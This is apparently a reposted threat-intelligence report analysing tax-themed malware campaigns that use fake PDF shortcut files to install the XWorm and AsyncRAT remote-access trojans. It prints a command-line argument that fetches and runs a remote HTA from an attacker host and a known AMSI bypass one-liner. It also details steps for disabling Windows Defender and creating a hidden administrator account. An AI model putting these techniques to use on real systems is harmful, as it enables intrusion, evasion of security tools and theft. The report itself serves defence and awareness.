X-Industry

It is tax time again in the US.  And that means scammers are out there trying to steal your information.  Targeting calendar-based events enables threat actors to prepare ahead of time and have a new selection of targets on rotation.  This report covers a few examples of malware that take advantage of tax season.  Although such attacks may seem repetitive to the casual observer, threat actors would not continue to target taxpayers if previous attacks had not been successful.  And they were.[1]

XWorm Delivered Through Tax Scam 

Researchers became aware of a curious-looking archive file hosted on an open directory on: www[.]farmaciasmv[.]com/citrix/2022%20tax_documents[.]zip, which has since been removed.

Figure 1. Empty open directory that hosted 2022%20tax_documents[.]zip

The zip file contains the following files:

Annual Withdrawal.xlsx (SHA2: 59bb292565ebc86800e5e4d625d3c19f98afe2261d3da1a8e2f9b45ec76153a0)

Robert tax_docs.pdf (SHA2: a9f4b054ea128529c62a8ff25f1439651f045e443adf5ff11fb5bd29f1333a7a)

Figure 2. Contents of the 2022%20tax_documents[.]zip

The XLSX file is a benign decoy file that contains financial data from an unknown source.

Figure 3. Contents of the Annual Withdrawal.xlsx

The other file is malicious.  Despite Robert tax_docs.pdf having a PDF icon, it is different from what it seems.  The file is actually a link (LNK) file that launches the legitimate script (C:\Windows\System32\SyncAppvPublishingServer.vbs), which has a known issue of taking command line arguments. The link file exploits this issue and feeds the legitimate script with the following command line argument to download and execute a remote “note.hta”:

;\W_\*2\\\m_h_a_e ('http'+'://datacenter002[.]myftp[.]biz/documents/note.'+'hta')

Copy

The downloaded note.hta uses PowerShell to download another remote file hosted on hxxp://datacenter002[.]myftp[.]biz/documents/note[.]gif, which was not available at the time of our investigation. Finding another note.gif (SHA2: 0487ef401345aa17c6aaeac23151219863e1363f82fe76edd0066bbf3fb07715) based on the same infection chain let us continue our quest to the payload.

note.gif is a PowerShell script that creates the following files:

C:\Users\Public\onedrive.vbs (SHA2: 92C1767EE4A954B93D6AFA9AE83FE82B82D2867D919D0359DCF2C8DA75FB8C7C)

C:\Users\Public\test.vbs (SHA2: ADBA59F1495965684EEB4C5DAAD67F732FEB5E9183AE05EB869E20C88CAD7327)

C:\Users\Public\onedrive.ps1 (SHA2: 7A9705A424A634A321DB9F36B61D74B953A44D44EDC429F7641BF830870572FC)

Once launched, it executes the onedrive.vbs and test.vbs files.

test.vbs creates %usertemp%\Note.txt, a clean file containing fake "QUARTERLY TAX PAYMENTS FOR 2022" data.

Figure 4. Note.txt containing fake “QUARTERLY TAX PAYMENTS FOR 2022” data

onedrive.vbs runs the previously created onedrive.ps1 filled with activities designed to hamper Windows Defender.  It first executes the following known AMSI (Antimalware Scripting Interface) bypass:

[Ref].Assembly.GetType(‘System.Management.Automation.AmsiUtils’)

.GetField(‘amsiInitFailed’,’NonPublic,Static’).SetValue($null,$true)

Copy

It also disables AMSI by hijacking the COM server, changing it from "%windir%\system32\amsi.dll" to "C:\IDontExist.dll". The PowerShell script then performs the following actions to alter Windows Defender settings:

Adds the following exclusions to Windows Defender

Extensions: .bat, .ppam, .xls, .docx, .bat, .exe, .vbs, .js

File paths: C:\, D:\, E:\

Processes: explorer.exe, kernel32.dll, aspnet_compiler.exe, cvtres.exe, CasPol.exe, csc.exe, Msbuild.exe, ilasm.exe, InstallUtil.exe, jsc.exe, Calc.exe, powershell.exe, rundll32.exe, conhost.exe, Cscript.exe, mshta.exe, cmd.exe, DefenderisasuckingAntivirus, wscript.exe

Allows known Windows Defender Threat IDs to execute.

Disables Windows Defender Attack Surface Reduction (ASR) rules.

Disables the following Windows Defender features:

• Intrusion Prevention System
• IO AV Protection (does not scan downloaded files and attachments)
• Realtime monitoring
• Script scanning
• Controlled folder access protection
• PUA protection
• Scheduled scan
• Sets Network Protection to audit mode in Windows Defender (allows users to visit known malicious sites but logs them in the event log)
• Disables MAPS (Microsoft Active Protection Service) reporting
• Never submits samples to Microsoft
• Allows severe/high/moderate/low-level threats to execute
• Disables the "administrator in Admin Approval Mode" user type (disables UAC prompts)
• Stops the WinDefend service (Windows Defender)
• Disables the startup of the WinDefend service
• Deletes the WinDefend service
• Creates a user named "System32" with the password “123” (no quotes)
• Adds the System32 user to both the "administrators" group and the "Remote Desktop Users" group
• Stops the Microsoft Defender Antivirus Network Inspection Service (WdNisSvc)
• Turns off Windows Firewall
• The PowerShell script finally uses reflective loading to load a binary into memory that injects XWorm RAT version 3.1.

Furthermore, we discovered other files that follow a similar attack pattern; “Mary tax docs.pdf.lnk” (SHA2: 6dee21d581eac2214e3ea7259bf9cb3e0cc31b442a372ffba00f82aa858050f0) and “Wilson tax_docs.pdf.lnk” (SHA2: c06cf72149d52b8a7c73b38c075156df4c458f633c3031c3c0ce32741ad1518e) that were used in March 2023. As with the attack mentioned previously, these link files are disguised as PDF files to fool potential victims into opening them.

“Mary tax docs.pdf.lnk”, along with another clean Microsoft Office file, “R&P Sales Summary.docx”, are included in an archived file labeled “2022 tax docs.zip”.  Running the link file triggers the download and execution of “doc.pdf” from “hxxp://datacenter11[.]myftp[.]org/notepad/”.  The “doc.pdf” is actually a VBA file that uses PowerShell to pull and run “hxxp://datacenter11[.]myftp[.]org/met/a[.]mp3”.  While the “a.mp3” is not available for investigation, OSINT (Open Source Intelligence) indicates that the XWorm malware is likely delivered to the victim’s machine.

XWorm

From the evidence that researchers accumulated during our research, we have high confidence that the 2022%20tax_documents[.]zip file we initially analyzed delivers the XWorm.

XWorm is a commodity RAT (Remote Access Trojan) reportedly sold in underground forums for $30 to $150.  XWorm supports typical RAT functions, such as taking screenshots, keylogging, and taking control of a compromised machine by abusing Virtual Network Computing (VNC), a technique infamously known as Hidden VNC (HVNC).  XWorm can also encrypt files, essentially acting in a similar fashion to ransomware.

Below are screenshots of a recently cracked version of XWorm v3.1:

Figure 5. Leaked cracked version of XWorm v3.1

 
Figure 6. Some of the functionalities supported by XWorm v3.1

Figure 7. Download page of the cracked version of XWorm v.3.1

Going back to the first example, “2022%20tax_documents[.]zip”, we found that it was hosted on the open directory “www[.]farmaciasmv[.]com/citrix/”.  Analysts also found another page on the same domain likely used for phishing hxxp://farmaciasmv[.]com/sharefile/citrix/2022%20taxes[.]html. The files involved in this attack were submitted to VirusTotal.  Researchers don’t believe victims just wander into such malicious sites by accident.  Based on our experience, they were likely lured via malicious links in spam emails.

Manual interactions are required up until the files inside the zip file are extracted, and the link file is manually run.  The basic security practice of not opening files from unknown sources can prevent infection and the damages that follow.

Dual Malware Wielding:

Another tax-related attack researchers came across is an image file named “TaxReturn2022.img” (SHA2: 6658d4b14f0093a2fccd2f57b5bf9fa18d09cda5d42036f280b41e5beb1ff2fe) that contains the following files:

TaxReturn2022.pdf.lnk (SHA2: 180a79cff5ef91ecd744a35b2e433d0a4aae0e4d3b87c40e8e51f5ca02aac4d6)

TaxReturns2022.pdf.lnk (SHA2: fa862d43a85a9ea6f046f3edc743b897bba86348c04b8d62ba6eb27f951edf55)

TaxReturns2022.zip (SHA2: c4599d4270ba8ef58fb8f1219ecff864acd83145c368ada9406a341d6f4a4fbf)

We were able to locate another file, “TaxReturns2022.iso” (SHA2: bb7138a106ee2e0a384896316679c750e3287b51fc16a5e65ccd1e44911162d6), that contains identical files.

Figure 8. Contents of TaxReturn2022.img

Figure 9. Contents of TaxReturns2022.iso

Unfortunately, the infection vector for both files has not been identified, but the likely attack avenue is an email containing malicious attachments and links.  The TaxReturns2022.zip file within both archives is password-protected with an unknown password, and its contents cannot be extracted.

As with the previous example, “TaxReturn2022.pdf.lnk” has a PDF icon. However, it’s a link (shortcut) file, as seen in Figure 4.  

Manually executing the lnk file triggers the download of wed.hta from hxxp://179.43.175[.]187/pqpf/ and saves it as %USERAPPDATA%\wed.hta (SHA2: 0cbaf95b9d4df27442d753dc4cb600eda0a7ecb95e4071f380f69f5f3c89adb1).
The downloaded file is an HTA web file containing VBScript code for the next action and a lot of junk code. It eventually runs:

powershell.exe -ExecutionPolicy UnRestricted [powershell code

Copy

This PowerShell code is designed to execute whatever was downloaded.  In this case, it downloads “TaxReturn2022.pdf” from hxxp://179.43.175[.]187/pqpf/, saves it as %USERAPPDATA%\TaxReturn2022.pdf, and opens it.  Unfortunately, this PDF file is a clean decoy file that also requires an unidentified password to open.

The PowerShell code sets the following registry entry to open the downloaded PDF file every time the computer boots and adds the HIDDEN file attribute to the file:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\iXqrVo = [location of downloaded PDF file]

Copy

This behavior led us to believe that the threat actor behind this attack relies on templates and uses them without really knowing what they are because there is no valid reason to open a decoy PDF file at every startup, and adding the HIDDEN file attribute is usually reserved for executables and DLLs.

The script then sleeps five seconds before downloading and executing whatever has been downloaded. In this case, it downloads TCywxTOvZk.wsf from hxxp://[redacted].67[.]12:222/ and saves it as %USERAPPDATA%\TCywxTOvZk.wsf (SHA2: 351b0514feaa6a2fc21af25ad7c6c9bed93e38ef896d3fb6c8633924d8615e2d). Note that part of the IP address masked as the directory is accessible.

TCywxTOvZk.wsf has only three meaningful lines of code out of almost 2840 lines and downloads and runs hxxp://[redacted].67[.]12:222/no[.]txt (SHA2: d7c63c4d488918aa09fcbd2012d041ed440377af51a87e757c40df3725b1eb07). no.txt contains VBScript code that downloads and executes hxxp://[redacted].67[.]12:222/j[.]png (SHA2: 460d093a55b930e733c60575f82183cd0edd52ec6b927cdb4a93dc5da7f0ac9c), which is a PowerShell script that creates the following files:

C:\ProgramData\Document\py.ps1

C:\ProgramData\schtasks\Microsoft.bat

C:\ProgramData\Document\x.ps1

The script then runs Microsoft.bat, which uses MSHTA.exe to run PowerShell code to run py.ps1. The .ps1 file contains two PE files (stored in $apprun and $appme). It uses 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' to reflectively load $apprun, which then loads $appme, which was identified as an ASync RAT variant that connects to the attacker’s Command-and-Control (C2) server located at nulled2nd[.]camdvr[.]org:6666.

We also found another .lnk file (SHA2: c0a59b28919282b3c45a9619410ea95e35f86dbf43266e6f9a25b94f5948018b) hidden in TaxReturns2022.pdf.iso (SHA2: ee1299f4e56c7f5af243df63192f1c7574152c0600edc49c37b9f8b703da02f2).

This link file goes through the same infection chain as the previous one:

• The link file downloads and executes hxxp://[redacted].67[.]12:222/xa[.]hta
• xa[.]hta downloads and executes hxxp://[redacted].67[.]12:222/qDxcmqPPmI[.]wsf
• wsf was not available at the time of the investigation. However, OSINT led us to find the next action.
• qDxcmqPPmI[.]wsf downloads and executes hxxp://[redacted].67[.]12:222/no[.]txt
• no[.]txt downloads and executes hxxp://[redacted].67[.]12:222/j[.]png
• png creates py.ps1 and x.ps1. It also creates and runs Microsoft.bat
• bat runs py.ps1, which eventually installs Async RAT on the compromised machine

The attacker left the hosting location of the malicious files wide open.

Figure 10. Files hosted on the attacker’s open directory

The directory contains a few files whose names are associated with Adobe Acrobat Reader DC.  This indicates that the threat actor also leverages Adobe as a lure to install the AsyncRAT variant.

readerdc64_en_l_cra_mdr_install_update.exe[.]lnk (SHA2: 653fcea661d8f7d996210dcdbcad110f0dcca8e7bbc906bb0a4d12e3ab674483)

readerdc64_en_l_cra_mdr_install_update[.]exe (SHA2: 1b012d01c86be5d68959504d362c52170b27d726cf2943e2e0250506a29c765a) – this is a legitimate Adobe Acrobat Reader DC installer.

reader64[.]hta (SHA2: 3b2e776ab44a711a52de88b02c007897eed137b62ecc7fb51bbb3089941bda1a)

readerdc64_en_ka_cra_mdr_install_update[.]wsf (SHA2: d2f0995f9184170386360d5eb5990e38a289052e6a15706613c9568a207da7d7)

AsyncRAT contains features designed to steal information from compromised machines and a clipper feature that monitors the clipboard for crypto wallet address swapping, which means victims may end up paying more than their taxes.

But however potential victims end up with the “TaxReturn2022.img” and “TaxReturns2022.pdf.iso” files on their system, users still need to manually mount them and run the fake PDFs to trigger the infection chain.  A little caution can go a long way toward protecting yourself against tax-related malware.

Conclusion: The attacks covered in this blog are the tip of the iceberg.  Attackers make every attempt to scam taxpayers for financial gain and data exfiltration for future attacks.  In the end, those looking to save a dime, in this case, from the IRS, often find that greed endangers them in the cyber world.

For additional information, please refer to the “Tax Scams/Consumer Alerts” alert issued by the IRS for other tips on protecting yourself from tax-related scams.

IOCs below:

Network IOCs

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization and we would like to thank Sentinel Labs with this great report.  For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance. com    

Weekly Cyber Intelligence Briefings:

• Reporting: https://www. redskyalliance. org/   
• Website: https://www. wapacklabs. com/  
• LinkedIn: https://www. linkedin. com/company/64265941   

Weekly Cyber Intelligence Briefings:

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/5504229295967742989

[1] https://www.fortinet.com/blog/threat-research/tax-scammers-at-large?lctg=141970831